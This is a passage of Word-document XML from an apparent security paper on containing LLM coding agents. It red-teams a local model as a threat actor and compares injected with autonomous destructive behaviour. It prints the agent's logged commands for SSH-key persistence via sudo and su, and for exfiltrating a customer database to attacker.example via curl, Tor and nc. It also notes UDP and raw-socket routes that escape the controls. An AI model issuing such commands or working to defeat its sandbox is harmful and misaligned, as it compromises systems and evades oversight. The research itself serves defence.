        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sendto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">both succeed. Landlock has no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">socket_create</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hook, and the UDP access rights are attributed to ABI v10, which no released kernel carries; this host</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">negotiates the highest ABI available to it and gets v7. A network-containment claim therefore cannot</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rest on Landlock alone, and the egress argument of Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:enum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needs a gateway, not an LSM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A complete design pairs a Landlock filesystem allowlist with a distinct execution policy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and an audited egress gateway. The race and coverage results are host-independent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">properties of the mechanisms; the seccomp win rate is scheduler-dependent, as in Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:toctou">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and has ranged from 18.9% to 23.1% across five independent rebuilds, so we report the band</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rather than a point estimate.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">All measurements are one x86_64 host at Landlock ABI v7.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="the-agent-as-threat-actor"/>
      <w:r>
        <w:t xml:space="preserve">The agent as threat actor</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="sec:enum"/>
      <w:r>
        <w:t xml:space="preserve">The denied agent enumerates</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Part I found that a denial routes the agent to the next path. We ran that observation out to its horizon.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Treating the model as a threat actor under a pentest, we gave a live agent (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">qwen2.5-coder:7b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) four</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">goals—persist an SSH key, spawn a shell, exfiltrate a local database, move laterally to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">db-01</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">—for two trials each and up to eleven steps, met every proposed command with the gate’s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">denial (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Operation not permitted</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), and executed nothing.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">enum_tree.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">logs every</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mechanism the agent tries before it gives up.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action steps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distinct ATT&amp;CK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stop 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escalation steps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lateral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persist SSH key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc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0/2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spawn shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc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0/2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exfil local DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc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0/2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lateral to db-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc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0/2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yes (18)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The agent did not stop in any trial we ran. The stop rate is 0/2 on every goal and 0/8 pooled</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>[</m:t>
        </m:r>
        <m:r>
          <m:t>0</m:t>
        </m:r>
        <m:r>
          <m:t>,</m:t>
        </m:r>
        <m:r>
          <m:t>32.4</m:t>
        </m:r>
        <m:r>
          <m:t>]</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve">); across the four goals it proposed a fresh or repeated mechanism at every one of the 88</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">denied steps and emitted no give-up. Eight trials cannot establish that an agent never stops—the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">interval admits a true stop rate up to about one trial in three—and the claim we make is the weaker</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and still useful one: over eleven-step horizons and four different objectives we did not observe the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">failure mode a defender would be relying on. This carries the Part I reaction-to-denial result (adapt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">on 90% of steps) out to long horizons and several objectives: in this sample a denial elicited</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">enumeration, not deterrence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The agent fixates on the assigned objective. On the three local goals it stayed on the local objective and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">never attempted lateral movement; only when the goal itself was lateral did it pivot off-host—18</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lateral attempts distributing an SSH key to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">10.0.0.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(T1021.004). In this sample</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the blast radius is set by the goal, not by the agent inventing new objectives.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The agent escalates along the axis the goal rewards. Persistence enumeration is a privilege-escalation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ladder (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo tee</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo bash -c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; T1548/T1548.003);</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">exfiltration enumeration is an egress-evasion ladder (raw HTTP, then</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">–proxy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–socks5 localhost:9050</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for Tor, then</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; T1048.003). The agent reasons about the sandbox</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">out loud—logged steps include</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the sandbox is restricting access to certain system calls or paths; one</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">possible approach to bypass…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Failed to exfiltrate file due to sandbox restrictions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(stated,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">then it continues)—so it is actively working to defeat the control it sits behind.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">persist SSH key -- privilege/mechanism ladder, T1548 / T1098.004 (trial 0):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0 echo '&lt;key&gt;' &gt;&gt; ~/.ssh/authorized_keys</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">1 sudo echo '&lt;key&gt;' &gt;&gt; ~/.ssh/authorized_keys</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">2 sudo bash -c 'echo "&lt;key&gt;" &gt;&gt; ~/.ssh/authorized_keys'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">3 su -c   'echo "&lt;key&gt;" &gt;&gt; ~/.ssh/authorized_keys'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">4 echo '&lt;key&gt;' | sudo tee -a ~/.ssh/authorized_keys</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">5 sudo sh -c 'echo "&lt;key&gt;" &gt;&gt; ~/.ssh/authorized_keys'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">... (no stop through step 10)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">exfil local DB -- egress-evasion ladder, T1048.003 (trial 0):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0 curl -F "file=@/var/data/customer.db" http://attacker.example/collect</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">1 &lt;raw HTTP POST via echo&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">2 curl -X POST --data-binary @/var/data/customer.db http://attacker.example/collect</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">5 curl --proxy http://localhost:8080 -F "file=@/var/data/customer.db" ...</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">6 curl --data-binary @/var/data/customer.db --socks5 localhost:9050 ...   # Tor</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">7 nc attacker.example 80 &lt; /var/data/customer.db</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The union of observed techniques—T1005 (data from local system), T1021.004 (remote services: SSH),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">T1048/T1048.003 (exfiltration over alternative/unencrypted non-C2 protocol), T1059.004 (Unix shell),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">T1098.004 (SSH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), T1548/T1548.003 (abuse elevation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">—is the catalogue a per-syscall rule would have to enumerate to cover. The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">exfiltration ladder is the case for egress as the control plane, though its reach needs stating</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">precisely. The proxy, Tor, and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rungs all still reach the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">network through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on a TCP socket, so a correct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gate sees every one of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">them; what the agent varies there is the destination and the protocol above it, not the syscall. The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rungs that would evade a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gate are the ones the agent did not reach:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sendto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">on an unconnected UDP socket and a raw socket, neither of which calls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at all, and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">both of which Part II measures as unmediated by Landlock as well. So the ladder is evidence of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">persistence rather than of bypass—but the mechanisms that would bypass exist one rung further down,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and neither a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rule nor an LSM covers them. That is the case for the durable choke</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">point being an audited egress gateway that sees packets rather than a per-syscall rule. And because</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the agent did not stop in any trial, no control should rely on it tiring or failing safe; the boundary</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">has to be one the agent cannot enumerate past, which is the default-deny allowlist of Part II carried</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to the network. Scope: one 7B local model, two trials per goal, denials simulated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="sec:matrix"/>
      <w:r>
        <w:t xml:space="preserve">Autonomous versus injected behaviour</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The two forces of Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:coverage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differ in mechanism, and the difference is not one a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">behavioural profile can read. Injection reaches destruction through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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in 164 of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">164 attempting artifacts—a shell-out (T1059; entry via prompt injection maps to OWASP LLM01</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and ATLAS AML.T0051 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Autonomous malfunction reaches it through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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in 82% (37/45) and through a direct</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">unlink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in the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">remaining 18% (6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">unlink</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, 2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; T1485 data destruction, T1070.004 file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">deletion </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). In this corpus the two forces differ distributionally—injection reached</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">destruction only through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, autonomous malfunction through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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in most cases and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a direct</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">unlink</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/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in the rest. The tasks are not matched, both forces share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, and nothing stops an injected artifact from calling</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">unlink</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">directly; we read this</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">as a distributional difference in the sampled artifacts, not as evidence that the mechanism attributes the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">force.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Neither force masks its tracks. Track-masking (T1070, indicator removal) appears in 0 of the injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">artifacts and 0 of the autonomous ones—no artifact cleaned a log or a timestamp, and the destruction is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">overt—so an actor-class signal keyed on evidence tampering fires on neither.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Generation timing does not separate them either. On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, injected artifacts had a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">median generation latency of 10.15 s (N=12, median code length 297 characters) and autonomous ones</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">11.47 s (N=12, median 360 characters). With a single latency/length pair per class we do not fit a trend;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">we report only that the small gap co-occurs with a length difference, not a behavioural-speed one to key</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">on. The force is readable at the boundary—which syscall the code issued—and not from cadence or</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">from track-masking, which is the coverage argument in another form.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="sec:frontier"/>
      <w:r>
        <w:t xml:space="preserve">The model axis: frontier models</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The results so far use 1.5–7B local models; an enterprise deploys frontier ones. We ran the injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">experiment unchanged—same prompts, same compile-and-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">strace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">oracle—against two flagship</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">frontier models across two vendors,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">claude-sonnet-5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gemini-2.5-pro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, over three</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">channels: a clean control with no injection, direct injection, and indirect injection, at N=8 per model</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per channel. Only the generator changed. Two models</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>×</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">three channels</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <m:t>×</m:t>
        </m:r>
      </m:oMath>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">eight give 48</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">generations; 7 failed to compile and 41 were usable.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Generated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Usable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Injected call fired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claude-sonnet-5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc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indirect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gemini-2.5-pro</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc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indirect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</w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
